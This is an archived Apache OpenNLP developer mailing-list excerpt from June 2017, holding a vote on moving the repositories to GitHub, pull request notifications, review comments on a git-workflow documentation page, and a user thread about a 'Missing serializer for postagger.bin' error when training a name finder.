 [ ] +1 Migrate all repositories to GitHub
 [ ] -1 Do not migrate,  because...

Thanks,
Jörn


Re: [VOTE] Migrate our main repositories to GitHub

2017-06-27 Thread Joern Kottmann
+1

Jörn

On Tue, Jun 27, 2017 at 12:30 PM, Joern Kottmann <kottm...@gmail.com> wrote:
> Hello all,
>
> let's decide here if we want to move our main repository, currently
> hosted at Apache, to GitHub instead. This will make our process a bit
> easier because we can eliminate one remote from our workflow.
>
>  [ ] +1 Migrate all repositories to GitHub
>  [ ] -1 Do not migrate,  because...
>
> Thanks,
> Jörn


[GitHub] opennlp pull request #238: Revert merging of sentiment work, no consent to m...

2017-06-27 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/238

Revert merging of sentiment work, no consent to merge it

Thank you for contributing to Apache OpenNLP.

In order to streamline the review of the contribution we ask you
to ensure the following steps have been taken:

### For all changes:
- [ ] Is there a JIRA ticket associated with this PR? Is it referenced 
 in the commit message?

- [ ] Does your PR title start with OPENNLP- where  is the JIRA 
number you are trying to resolve? Pay particular attention to the hyphen "-" 
character.

- [ ] Has your PR been rebased against the latest commit within the target 
branch (typically master)?

- [ ] Is your initial contribution a single, squashed commit?

### For code changes:
- [ ] Have you ensured that the full suite of tests is executed via mvn 
clean install at the root opennlp folder?
- [ ] Have you written or updated unit tests to verify your changes?
- [ ] If adding new dependencies to the code, are these dependencies 
licensed in a way that is compatible for inclusion under [ASF 
2.0](http://www.apache.org/legal/resolved.html#category-a)? 
- [ ] If applicable, have you updated the LICENSE file, including the main 
LICENSE file in opennlp folder?
- [ ] If applicable, have you updated the NOTICE file, including the main 
NOTICE file found in opennlp folder?

### For documentation related changes:
- [ ] Have you ensured that format looks appropriate for the output in 
which it is rendered?

### Note:
Please ensure that once the PR is submitted, you check travis-ci for build 
issues and submit an update to your PR as soon as possible.


You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp revert_sentiment

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/238.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #238


commit 123222eb34724bae793e9d6d22e202c0aee0aa45
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-06-27T08:19:19Z

Revert merging of sentiment work, no consent to merge it






[GitHub] opennlp pull request #237: OPENNLP-1092: Fix pos model serialization bug

2017-06-26 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/237

OPENNLP-1092: Fix pos model serialization bug



You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1092

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/237.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #237


commit 97281ba4a752536c261bc739e165309e70363399
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-06-26T14:20:09Z

OPENNLP-1092: Fix pos model serialization bug






[GitHub] opennlp pull request #236: OPENNLP-1097: Enable the normalizers by default i...

2017-06-22 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/236

OPENNLP-1097: Enable the normalizers by default in langdetect



You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1097

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/236.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #236








[GitHub] opennlp pull request #235: OPENNLP-1096: Swap for loops in ngram generation ...

2017-06-22 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/235

OPENNLP-1096: Swap for loops in ngram generation to be cache friendly



You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1096

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/235.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #235


commit 140695f4cd97080d48e9915e597db0fbf65d6320
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-06-22T12:41:56Z

OPENNLP-1096: Swap for loops in ngram generation to be cache friendly






[GitHub] opennlp-site pull request #11: OPENNLP-1045: Git documentation for developer...

2017-06-22 Thread kottmann
Github user kottmann commented on a diff in the pull request:

https://github.com/apache/opennlp-site/pull/11#discussion_r123445407
  
--- Diff: src/main/jbake/content/using-git.ad ---
@@ -0,0 +1,113 @@
+
+   Licensed to the Apache Software Foundation (ASF) under one
+   or more contributor license agreements.  See the NOTICE file
+   distributed with this work for additional information
+   regarding copyright ownership.  The ASF licenses this file
+   to you under the Apache License, Version 2.0 (the
+   "License"); you may not use this file except in compliance
+   with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+   Unless required by applicable law or agreed to in writing,
+   software distributed under the License is distributed on an
+   "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+   KIND, either express or implied.  See the License for the
+   specific language governing permissions and limitations
+   under the License.   
+
+= Using Git
+:jbake-type: page
+:jbake-tags: maven
+:jbake-status: published
+:idprefix:
+
+## Introduction
+
+The Apache OpenNLP project has a series of rules that every developer must adhere to. The contents of this page
+can be helpful even to experienced developers, as they include information about merging GitHub pull requests
+programmatically, which is not an easy task, especially for users who are more familiar with the web interface.
+
+Simple rules include always merging pull requests with fast-forward, using a JIRA ticket ID in the commit message
+whenever possible, and always squashing pull requests. Also, changes are verified by a build server, so developers
+must remember to check that all tests pass, as well as other quality checks such as code style.
+
+## Cloning the OpenNLP Git repository
+
+After obtaining committership to OpenNLP, you probably want to submit your changes to the project source repository.
+This section contains the steps that every committer must follow, so that every developer follows the same
+workflow and the project keeps a consistent and simple commit tree.
+
+git clone https://git-wip-us.apache.org/repos/asf/opennlp.git
+cd opennlp
+git config user.name "Your Name"
+git config user.email "your-email"
+git config merge.ff only
+
+You can also clone the project web site repository.
+
+git clone https://git-wip-us.apache.org/repos/asf/opennlp-site.git
+# repeat remaining steps as above
+
+In order to test your commit rights, and following a project tradition, normally the first commit of every new
+member is to add his/her name to the list of project members. Look for the `team.ad` source file in the web site
+repository, add your name, and try sending your first commit.
+
+For a complete list of the project repositories, visit the link:/source-code.html[Source Code] section.
+
+## Merging Pull Requests
+
+This section documents the process of merging code changes contributed via
+link:https://help.github.com/articles/about-pull-requests/[GitHub Pull Requests]. It is important to
+remember to **always merge with link:https://git-scm.com/docs/git-merge[fast-forward]**. If you followed the steps in
+the first section, your local working copy should already be configured for that. Otherwise, remember to use `--ff-only`
+when merging.
+
+### Adding a remote repository pointing to GitHub
+
+In order to fetch the pull requests in GitHub, you need to add a remote repository.
+
+git remote add github https://github.com/apache/opennlp.git
+git fetch --all
+git fetch github pull//head:
+git checkout 
+
+Replace `` with the GitHub pull request ID (you can find it in the pull request URL) and `` with
+the name of the new local branch. If you have suggestions to enhance or fix the pull request, send your comments via
+the GitHub user interface, or add a comment to the JIRA ticket  if any.
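As an illustration of the fetch step just described, the sketch below derives the pull request ID from a pull request URL and builds the `pull/<id>/head:<branch>` refspec that GitHub exposes for pull requests. The helper names `pr_id_from_url` and `pr_refspec` and the local branch name `pr-11` are hypothetical; the URL is one quoted in this thread. The final command is printed, not executed.

```shell
#!/bin/sh
# Hypothetical helper: extract the numeric ID from a GitHub pull request URL.
pr_id_from_url() {
    # Drop everything up to and including "/pull/" ...
    rest=${1##*/pull/}
    # ... then drop the first non-digit character and whatever follows it.
    printf '%s\n' "${rest%%[!0-9]*}"
}

# Hypothetical helper: build the refspec "pull/<id>/head:<local-branch>".
pr_refspec() {
    printf 'pull/%s/head:%s\n' "$1" "$2"
}

url="https://github.com/apache/opennlp-site/pull/11#discussion_r123445407"
id=$(pr_id_from_url "$url")
branch="pr-$id"   # local branch name chosen for this example only

echo "git fetch github $(pr_refspec "$id" "$branch")"
echo "git checkout $branch"
```

Here "github" is the remote name added in the commands above; any other remote that points at the GitHub repository would work the same way.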
+
+Once you are happy with the changes, you can check out the master branch, and merge the pull request. Remember
+to make sure the **branch has been rebased against master**, and also that all tests pass.
+
+git checkout master
+git merge --ff-only 
+git push origin master
+
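To see why the rebase matters for a fast-forward-only merge, the following sketch builds a throwaway local repository in which master moves on after a branch was created. It is an assumption-laden demo, not project tooling: the function name `ff_only_demo`, the branch name `pr-branch`, the file names and the commit identity are all invented for the example, and nothing is pushed anywhere.

```shell
#!/bin/sh
# Sketch: `git merge --ff-only` refuses a diverged branch and accepts it
# once the branch has been rebased onto master.
ff_only_demo() {
    repo=$(mktemp -d)
    # Wrapper that pins the repository and a placeholder commit identity.
    g() { git -C "$repo" -c user.name="Demo" -c user.email="demo@example.invalid" "$@"; }

    git init -q "$repo"
    g symbolic-ref HEAD refs/heads/master   # make sure the first branch is "master"
    echo base > "$repo/base.txt"
    g add base.txt
    g commit -q -m "base"

    # A contributor branch with one commit.
    g checkout -q -b pr-branch
    echo change > "$repo/pr.txt"
    g add pr.txt
    g commit -q -m "PR work"

    # Meanwhile master gets another commit, so the branches diverge.
    g checkout -q master
    echo other > "$repo/other.txt"
    g add other.txt
    g commit -q -m "unrelated commit on master"

    if g merge --ff-only pr-branch >/dev/null 2>&1; then before=merged; else before=refused; fi

    # Rebase the branch onto master, then retry the fast-forward merge.
    g checkout -q pr-branch
    g rebase -q master >/dev/null 2>&1
    g checkout -q master
    if g merge --ff-only pr-branch >/dev/null 2>&1; then after=merged; else after=refused; fi

    rm -rf "$repo"
    echo "$before $after"
}

ff_only_demo
```

The first word printed reports the merge attempt before the rebase and the second the attempt after it.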
+In case other commits happened after the pull request was submitted, you must ask the user to rebase the pull
+request against the master branch, and squash their commits. Alternatively, you can rebase and squash the commits
+yourself when there is no feedback from the user.
+
+git checkout 
+git rebase master
+# squash a

[GitHub] opennlp-site pull request #11: OPENNLP-1045: Git documentation for developer...

2017-06-22 Thread kottmann
Github user kottmann commented on a diff in the pull request:

https://github.com/apache/opennlp-site/pull/11#discussion_r123445203
  
--- Diff: src/main/jbake/content/using-git.ad ---

[GitHub] opennlp-site pull request #11: OPENNLP-1045: Git documentation for developer...

2017-06-22 Thread kottmann
Github user kottmann commented on a diff in the pull request:

https://github.com/apache/opennlp-site/pull/11#discussion_r123445064
  
--- Diff: src/main/jbake/content/using-git.ad ---
@@ -0,0 +1,113 @@
+
+   Licensed to the Apache Software Foundation (ASF) under one
+   or more contributor license agreements.  See the NOTICE file
+   distributed with this work for additional information
+   regarding copyright ownership.  The ASF licenses this file
+   to you under the Apache License, Version 2.0 (the
+   "License"); you may not use this file except in compliance
+   with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+   Unless required by applicable law or agreed to in writing,
+   software distributed under the License is distributed on an
+   "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+   KIND, either express or implied.  See the License for the
+   specific language governing permissions and limitations
+   under the License.   
+
+= Using Git
+:jbake-type: page
+:jbake-tags: maven
+:jbake-status: published
+:idprefix:
+
+## Introduction
+
+The Apache OpenNLP project has a series of rules that every developer must adhere to. The contents of this page
+can be helpful even to experienced developers, as they include information about merging GitHub pull requests
+programmatically, which is not an easy task, especially for users who are more familiar with the web interface.
+
+Simple rules include always merging pull requests with fast-forward, using a JIRA ticket ID in the commit message
+whenever possible, and always squashing pull requests. Also, changes are verified by a build server, so developers
+must remember to check that all tests pass, as well as other quality checks such as code style.
+
+## Cloning the OpenNLP Git repository
+
+After obtaining committership to OpenNLP, you probably want to submit your changes to the project source repository.
+This section contains the steps that every committer must follow, so that every developer follows the same
+workflow and the project keeps a consistent and simple commit tree.
+
+git clone https://git-wip-us.apache.org/repos/asf/opennlp.git
+cd opennlp
+git config user.name "Your Name"
+git config user.email "your-email"
+git config merge.ff only
+
+You can also clone the project web site repository.
+
+git clone https://git-wip-us.apache.org/repos/asf/opennlp-site.git
+# repeat remaining steps as above
+
+In order to test your commit rights, and following a project tradition, 
normally the first commit of every new
+member is to add his/her name to the list of project members. Look for the 
`team.ad` source file in the web site
+repository, add your name, and try sending your first commit.
+
+For a complete list of the project repositories, visit the 
link:/source-code.html[Source Code] section.
+
+## Merging Pull Requests
+
+This section documents the process of merging code changes contributed via
+link:https://help.github.com/articles/about-pull-requests/[GitHub Pull Requests]. It is important to
+remember to **always merge with link:https://git-scm.com/docs/git-merge[fast-forward]**. If you followed the steps in
+the first section, your local working copy should already be configured for that. Otherwise, remember to use `--ff-only`
+when merging.
+
+### Adding a remote repository pointing to GitHub
+
+In order to fetch the pull requests in GitHub, you need to add a remote 
repository.
+
+git remote add github https://github.com/apache/opennlp.git
+git fetch --all
+git fetch github pull//head:
+git checkout 
+
+Replacing `` by the GitHub pull request ID (you can find it in 
the pull request URL) and `` by
+the name of the new local branch. If you have suggestions to enhance or 
fix the pull request, send your comments via
+the GitHub user interface, or add a comment to the JIRA ticket  if 
any.
+
+Once you are happy with the changes, you can check out the master branch, and merge the pull request. Remember
+to make sure the **branch has been rebased against master**, and also that all tests pass.
+
+git checkout master
+git merge --ff-only 
+git push origin master
+
+In case other commits happened after the pull request was submitted, you 
must ask the user to rebase the pull
--- End diff --

The easiest thing is to rebase yourself; the contributor only needs to be
involved if there are conflicts.



[GitHub] opennlp-site pull request #21: OPENNLP-1045: Add Git development page (adapt...

2017-06-22 Thread kottmann
Github user kottmann commented on a diff in the pull request:

https://github.com/apache/opennlp-site/pull/21#discussion_r123442070
  
--- Diff: src/main/jbake/content/using-git.ad ---
@@ -0,0 +1,178 @@
+
+   Licensed to the Apache Software Foundation (ASF) under one
+   or more contributor license agreements.  See the NOTICE file
+   distributed with this work for additional information
+   regarding copyright ownership.  The ASF licenses this file
+   to you under the Apache License, Version 2.0 (the
+   "License"); you may not use this file except in compliance
+   with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+   Unless required by applicable law or agreed to in writing,
+   software distributed under the License is distributed on an
+   "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+   KIND, either express or implied.  See the License for the
+   specific language governing permissions and limitations
+   under the License.   
+
+= Using Git
+:jbake-type: page
+:jbake-tags: maven
+:jbake-status: published
+:idprefix:
+
+There are several ways to set up Git for committers and contributors. 
Contributors can safely set up Git any way they
+choose but committers should take extra care since they can push new 
commits to the master at Apache and various
+policies there make backing out mistakes problematic. Therefore all but 
very small changes should go through a PR,
+even for committers. To keep the commit history clean take note of the use 
of `--squash` below when merging into
+`apache/master`.
+
+## Git setup for Committers
+
+This describes setup for one local repo and two remotes. It allows you to 
push the code on your machine to either your
+GitHub repo or to Git at Apache (i.e. git-wip-us.apache.org). You will 
want to fork GitHub's apache/opennlp to your own
+account on GitHub, this will enable Pull Requests of your own. Cloning 
this fork locally will set up "origin" to point
+to your remote fork on GitHub as the default remote. So if you perform 
"git push origin master" it will go to GitHub.
+
+To attach to the apache Git repo do the following:
+
+git remote add apache 
https://git-wip-us.apache.org/repos/asf/opennlp.git
+
+To check your remote setup:
+
+git remote -v
+
+You should see something like this:
+
+origin  https://github.com/your-github-id/opennlp.git (fetch)
+origin  https://github.com/your-github-id/opennlp.git (push)
+apache  https://git-wip-us.apache.org/repos/asf/opennlp.git (fetch)
+apache  https://git-wip-us.apache.org/repos/asf/opennlp.git (push)
+
+Now if you want to experiment with a branch, this by default points to 
your GitHub account because "origin" is default.
+You can work as you normally do using just GitHub, until you are ready to 
merge with the Apache remote repository.
+Some conventions will integrate with Apache JIRA ticket numbers.
+
+git checkout -b opennlp- # typically is a JIRA ticket number
+#do some work on the branch
+git commit -a -m "doing some work"
+git push origin opennlp- # notice pushing to **origin** not 
**apache**
+
+Once you are ready to commit to the Apache remote you can merge and push 
them directly, or better yet create a
+pull request (PR). 
+
+## How to create a PR (committers)
+
+Push your branch to GitHub:
+
+git checkout opennlp-
+git push origin opennlp-
+
+Go to your opennlp- branch on GitHub. Since you forked it from 
GitHub's apache/opennlp it will default any PR to
+go to apache/master. 
+
+* Click the green "Compare, review, and create pull request" button. 
+* You can edit the _to_ and _from_ for the PR if it is not correct. The 
"base fork" should be apache/opennlp unless
+you are collaborating separately with one of the committers on the list. 
The "base" will be master. Do not submit a
+PR to one of the other branches unless you know what you are doing. The 
"head fork" will be your forked repo and the
+"compare" will be your opennlp- branch. 
+* Click the "Create pull request" button and name the request 
"OPENNLP-" (uppercase). This will connect the
+comments of the PR to the mailing list and JIRA comments.
+* From now on the PR lives on GitHub's apache/opennlp. You can use the 
commenting UI there. 
+* If you are looking for a review or sharing with someone else say so in 
the comments but do not worry about 
+automated merging of your PR -- you will have to do that later. The P

[GitHub] opennlp-site pull request #21: OPENNLP-1045: Add Git development page (adapt...

2017-06-22 Thread kottmann
Github user kottmann commented on a diff in the pull request:

https://github.com/apache/opennlp-site/pull/21#discussion_r123438951
  
--- Diff: src/main/jbake/content/using-git.ad ---
@@ -0,0 +1,178 @@
+
+   Licensed to the Apache Software Foundation (ASF) under one
+   or more contributor license agreements.  See the NOTICE file
+   distributed with this work for additional information
+   regarding copyright ownership.  The ASF licenses this file
+   to you under the Apache License, Version 2.0 (the
+   "License"); you may not use this file except in compliance
+   with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+   Unless required by applicable law or agreed to in writing,
+   software distributed under the License is distributed on an
+   "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+   KIND, either express or implied.  See the License for the
+   specific language governing permissions and limitations
+   under the License.   
+
+= Using Git
+:jbake-type: page
+:jbake-tags: maven
+:jbake-status: published
+:idprefix:
+
+There are several ways to set up Git for committers and contributors. 
Contributors can safely set up Git any way they
+choose but committers should take extra care since they can push new 
commits to the master at Apache and various
+policies there make backing out mistakes problematic. Therefore all but 
very small changes should go through a PR,
+even for committers. To keep the commit history clean take note of the use 
of `--squash` below when merging into
+`apache/master`.
+
+## Git setup for Committers
+
+This describes setup for one local repo and two remotes. It allows you to 
push the code on your machine to either your
+GitHub repo or to Git at Apache (i.e. git-wip-us.apache.org). You will 
want to fork GitHub's apache/opennlp to your own
+account on GitHub, this will enable Pull Requests of your own. Cloning 
this fork locally will set up "origin" to point
+to your remote fork on GitHub as the default remote. So if you perform 
"git push origin master" it will go to GitHub.
+
+To attach to the apache Git repo do the following:
+
+git remote add apache 
https://git-wip-us.apache.org/repos/asf/opennlp.git
+
+To check your remote setup:
+
+git remote -v
+
+You should see something like this:
+
+origin  https://github.com/your-github-id/opennlp.git (fetch)
+origin  https://github.com/your-github-id/opennlp.git (push)
+apache  https://git-wip-us.apache.org/repos/asf/opennlp.git (fetch)
+apache  https://git-wip-us.apache.org/repos/asf/opennlp.git (push)
+
+Now if you want to experiment with a branch, this by default points to 
your GitHub account because "origin" is default.
+You can work as you normally do using just GitHub, until you are ready to 
merge with the Apache remote repository.
+Some conventions will integrate with Apache JIRA ticket numbers.
+
+git checkout -b opennlp- # typically is a JIRA ticket number
+#do some work on the branch
+git commit -a -m "doing some work"
+git push origin opennlp- # notice pushing to **origin** not 
**apache**
+
+Once you are ready to commit to the Apache remote you can merge and push 
them directly, or better yet create a
--- End diff --

We should not say "you can merge and push them directly"


---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


[GitHub] opennlp pull request #232: Remove pmap indirection

2017-06-16 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/232

Remove pmap indirection

Thank you for contributing to Apache OpenNLP.

In order to streamline the review of the contribution we ask you
to ensure the following steps have been taken:

### For all changes:
- [ ] Is there a JIRA ticket associated with this PR? Is it referenced 
 in the commit message?

- [ ] Does your PR title start with OPENNLP- where  is the JIRA 
number you are trying to resolve? Pay particular attention to the hyphen "-" 
character.

- [ ] Has your PR been rebased against the latest commit within the target 
branch (typically master)?

- [ ] Is your initial contribution a single, squashed commit?

### For code changes:
- [ ] Have you ensured that the full suite of tests is executed via mvn 
clean install at the root opennlp folder?
- [ ] Have you written or updated unit tests to verify your changes?
- [ ] If adding new dependencies to the code, are these dependencies 
licensed in a way that is compatible for inclusion under [ASF 
2.0](http://www.apache.org/legal/resolved.html#category-a)? 
- [ ] If applicable, have you updated the LICENSE file, including the main 
LICENSE file in opennlp folder?
- [ ] If applicable, have you updated the NOTICE file, including the main 
NOTICE file found in opennlp folder?

### For documentation related changes:
- [ ] Have you ensured that format looks appropriate for the output in 
which it is rendered?

### Note:
Please ensure that once the PR is submitted, you check travis-ci for build 
issues and submit an update to your PR as soon as possible.


You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp pmap_perf

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/232.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #232


commit 7f1dd3b3204df67973575d4a538557b04a19460c
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-06-14T12:34:14Z

Remove pmap indirection






Re: Missing serializer for postagger.bin

2017-06-14 Thread Joern Kottmann
ALIZED))) {
> >> model.serialize(modelOut);
> >> }
> >>
> >> } catch (Exception ex) {
> >> ex.printStackTrace();
> >> }
> >>
> >> }
> >> }
> >> }
> >>
> >> public static POSModel loadPosTagger (String modelName) {
> >>
> >> try (InputStream modelIn = new FileInputStream(modelName)) {
> >> POSModel model = new POSModel(modelIn);
> >> return model;
> >> }
> >> catch (Exception ex) { ex.printStackTrace();  }
> >>
> >> return null;
> >> }
> >> }
> >>
> >> *GENERATORS:*
> >>
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >> 
> >>
> >>
> >> *OUTPUT (with error):*
> >>
> >>
> >> Indexing events using cutoff of 0
> >>   Computing event counts...  done. 30 events
> >>   Indexing...  done.
> >> Collecting events... Done indexing.
> >> Incorporating indexed data for training...  done.
> >>   Number of Event Tokens: 30
> >>   Number of Outcomes: 2
> >>   Number of Predicates: 144
> >> Computing model parameters...
> >> Performing 300 iterations.
> >>   1:  . (27/30) 0.9
> >>   2:  . (30/30) 1.0
> >>   3:  . (30/30) 1.0
> >>   4:  . (30/30) 1.0
> >>   5:  . (30/30) 1.0
> >> Stopping: change in training set accuracy less than 1.0E-5
> >> Stats: (30/30) 1.0
> >> ...done.
> >> Compressed 144 parameters to 621 outcome patterns
> >> java.lang.IllegalStateException: Missing serializer for postagger.bin
> >>   at opennlp.tools.util.model.BaseModel.serialize(BaseModel.java:589)
> >>   at com.damiano.trainer.Test.<init>(Test.java:75)
> >>   at com.damiano.trainer.Test.main(Test.java:31)
> >>
> >> 2017-06-07 15:48 GMT+02:00 Damiano Porta <damianopo...@gmail.com>:
> >>
> >>> Hmm let me try again, yes i copied it badly, i think the names are
> >>> correct, i will give you a working example.
> >>>
> >>> 2017-06-07 15:46 GMT+02:00 Joern Kottmann <kottm...@gmail.com>:
> >>>
> >>>> Ok, but are you sure you used matching names? The exception states
> >>>> it-pos-maxent.bin,
> >>>> which object did you map to it?
> >>>>
> >>>> Jörn
> >>>>
> >>>> On Wed, Jun 7, 2017 at 3:22 PM, Damiano Porta <damianopo...@gmail.com>
> >>>> wrote:
> >>>>
> >>>> > Hi Jorn! Yes
> >>>> >
> >>>> > <dependency>
> >>>> >   <groupId>org.apache.opennlp</groupId>
> >>>> >   <artifactId>opennlp-tools</artifactId>
> >>>> >   <version>1.8.0</version>
> >>>> > </dependency>
> >>>> >
> >>>> > Do I need other dependencies too?
> >>>> >
> >>>> >
> >>>> >
> >>>> > 2017-06-07 14:53 GMT+02:00 Joern Kottmann <kottm...@gmail.com>:
> >>>> >
> >>>> > > This should be working. Did you test with 1.8.0?
> >>>> > >
> >>>> > > Jörn
> >>>> > >
> >>>> > > On Mon, Jun 5, 2017 at 3:43 PM, Damiano Porta <damianopo...@gmail.com>
> >>>> > > wrote:
> >>>> > >
> >>>> > > > Hello,
> >>>> > > > i am using the POSTaggerFeatureGenerator via generators.xml
> >>>> > > >
> >>>> > > > 
> >>>> > > >
> >>>> > > > during the training i add this model in the resources doing:
> >>>> > > >
> >>>> > > > HashMap<String, Object> map = new HashMap<>();
> >>>> > > > map.put("postagger.bin", myPostaggerModel);
> >>>> > > >
> >>>> > > >
> >>>> > > >  factory = new TokenNameFinderFactory(
> >>>> > > >IOUtils.toByteArray(in),
> >>>> > > >map,
> >>>> > > >new BioCodec()
> >>>> > > >  );
> >>>> > > >
> >>>> > > > I get this error:
> >>>> > > >
> >>>> > > > java.lang.IllegalStateException: Missing serializer for it-pos-maxent.bin
> >>>> > > > at opennlp.tools.util.model.BaseModel.serialize(BaseModel.java:589)
> >>>> > > > at com.damiano.nlp.ner.trainer.Trainer.<init>(Trainer.java:187)
> >>>> > > > at com.damiano.nlp.ner.trainer.Trainer.main(Trainer.java:44)
> >>>> > > > 2017-06-05 15:37:35 INFO  Trainer:192 - java.lang.IllegalStateException:
> >>>> > > > Missing serializer for postagger.bin
> >>>> > > >
> >>>> > > > Do i have to change the extension of the file?
> >>>> > > >
> >>>> > > > Thanks
> >>>> > > >
> >>>> > >
> >>>> >
> >>>>
> >>>
> >>>
> >>
> >
>


Re: Missing serializer for postagger.bin

2017-06-07 Thread Joern Kottmann
Ok, but are you sure you used matching names? The exception states
it-pos-maxent.bin,
which object did you map to it?

Jörn

On Wed, Jun 7, 2017 at 3:22 PM, Damiano Porta <damianopo...@gmail.com>
wrote:

> Hi Jorn! Yes
>
> <dependency>
>   <groupId>org.apache.opennlp</groupId>
>   <artifactId>opennlp-tools</artifactId>
>   <version>1.8.0</version>
> </dependency>
>
> Do I need other dependencies too?
>
>
>
> 2017-06-07 14:53 GMT+02:00 Joern Kottmann <kottm...@gmail.com>:
>
> > This should be working. Did you test with 1.8.0?
> >
> > Jörn
> >
> > On Mon, Jun 5, 2017 at 3:43 PM, Damiano Porta <damianopo...@gmail.com>
> > wrote:
> >
> > > Hello,
> > > i am using the POSTaggerFeatureGenerator via generators.xml
> > >
> > > 
> > >
> > > during the training i add this model in the resources doing:
> > >
> > > HashMap<String, Object> map = new HashMap<>();
> > > map.put("postagger.bin", myPostaggerModel);
> > >
> > >
> > >  factory = new TokenNameFinderFactory(
> > >IOUtils.toByteArray(in),
> > >map,
> > >new BioCodec()
> > >  );
> > >
> > > I get this error:
> > >
> > > java.lang.IllegalStateException: Missing serializer for it-pos-maxent.bin
> > > at opennlp.tools.util.model.BaseModel.serialize(BaseModel.java:589)
> > > at com.damiano.nlp.ner.trainer.Trainer.<init>(Trainer.java:187)
> > > at com.damiano.nlp.ner.trainer.Trainer.main(Trainer.java:44)
> > > 2017-06-05 15:37:35 INFO  Trainer:192 - java.lang.IllegalStateException:
> > > Missing serializer for postagger.bin
> > >
> > > Do i have to change the extension of the file?
> > >
> > > Thanks
> > >
> >
>


Re: Missing serializer for postagger.bin

2017-06-07 Thread Joern Kottmann
This should be working. Did you test with 1.8.0?

Jörn

On Mon, Jun 5, 2017 at 3:43 PM, Damiano Porta 
wrote:

> Hello,
> I am using the POSTaggerFeatureGenerator via generators.xml
>
> 
>
> During training I add this model to the resources by doing:
>
> HashMap<String, Object> map = new HashMap<>();
> map.put("postagger.bin", myPostaggerModel);
>
>
>  factory = new TokenNameFinderFactory(
>IOUtils.toByteArray(in),
>map,
>new BioCodec()
>  );
>
> I get this error:
>
> java.lang.IllegalStateException: Missing serializer for it-pos-maxent.bin
> at opennlp.tools.util.model.BaseModel.serialize(BaseModel.java:589)
> at com.damiano.nlp.ner.trainer.Trainer.<init>(Trainer.java:187)
> at com.damiano.nlp.ner.trainer.Trainer.main(Trainer.java:44)
> 2017-06-05 15:37:35 INFO  Trainer:192 - java.lang.IllegalStateException:
> Missing serializer for postagger.bin
>
> Do I have to change the extension of the file?
>
> Thanks
>
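
The "matching names" question in this thread can be illustrated with a small stand-alone Java toy. It is not OpenNLP code: `ToyModel`, `register`, `addArtifact`, and the rule that a serializer is picked by the extension of the entry name are all assumptions made for illustration. The sketch only shows how a name-keyed lookup produces a "Missing serializer for ..." failure when an entry has no matching serializer.

```java
import java.nio.charset.StandardCharsets;
import java.util.LinkedHashMap;
import java.util.Map;
import java.util.function.Function;

final class ToyModel {
    // Hypothetical registry: file extension -> function that turns an artifact into bytes.
    private final Map<String, Function<Object, byte[]>> serializers = new LinkedHashMap<>();
    // Resources attached to the model, keyed by entry name (for example "postagger.bin").
    private final Map<String, Object> artifacts = new LinkedHashMap<>();

    void register(String extension, Function<Object, byte[]> serializer) {
        serializers.put(extension, serializer);
    }

    void addArtifact(String name, Object artifact) {
        artifacts.put(name, artifact);
    }

    // The extension is the text after the last dot; empty if the name has no dot.
    static String extensionOf(String name) {
        int dot = name.lastIndexOf('.');
        return dot < 0 ? "" : name.substring(dot + 1);
    }

    // Serializes every artifact and returns the total byte count.
    // Fails as soon as an entry has no serializer registered for its extension.
    int serialize() {
        int total = 0;
        for (Map.Entry<String, Object> entry : artifacts.entrySet()) {
            Function<Object, byte[]> serializer = serializers.get(extensionOf(entry.getKey()));
            if (serializer == null) {
                throw new IllegalStateException("Missing serializer for " + entry.getKey());
            }
            total += serializer.apply(entry.getValue()).length;
        }
        return total;
    }

    public static void main(String[] args) {
        ToyModel model = new ToyModel();
        model.register("txt", o -> o.toString().getBytes(StandardCharsets.UTF_8));
        model.addArtifact("notes.txt", "hello");
        System.out.println(model.serialize());

        // No serializer is registered for "bin", so this entry makes serialize() fail.
        model.addArtifact("postagger.bin", new Object());
        try {
            model.serialize();
        } catch (IllegalStateException ex) {
            System.out.println(ex.getMessage());
        }
    }
}
```

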